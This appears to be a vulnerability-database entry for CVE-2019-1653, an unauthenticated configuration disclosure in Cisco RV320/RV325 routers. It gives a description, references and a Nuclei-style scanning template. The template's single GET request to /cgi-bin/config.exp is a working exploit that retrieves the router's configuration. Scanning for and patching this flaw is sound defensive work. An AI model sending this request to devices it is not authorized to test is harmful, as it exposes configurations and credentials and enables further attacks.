CVE-2019-1653: Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure

日期: 2025-08-01 | 影响软件: Cisco Small Business WAN VPN Routers | POC: 已公开

漏洞描述

Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.

PoC代码[已公开]

id: CVE-2019-1653

info:
  name: Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure
  author: dwisiswant0
  severity: high
  description: |
    Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
  remediation: |
    Cisco has released firmware updates that address this vulnerability.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
    - https://www.exploit-db.com/exploits/46262/
    - https://www.exploit-db.com/exploits/46655/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1653
    - http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-1653
    cwe-id: CWE-200,CWE-284
    epss-score: 0.94323
    epss-percentile: 0.99946
    cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: rv320_firmware
  tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/config.exp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "sysconfig"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c308a7383d377e3c39b1b8bc34c22e42f8f76ad830003c78d33beadb503304fc022033dc5e945d2fcd75fb4c54aebdbd3321c11aab5f7d40dd88905ff93125c474be:922c64590222798bb761d5b6d8e72950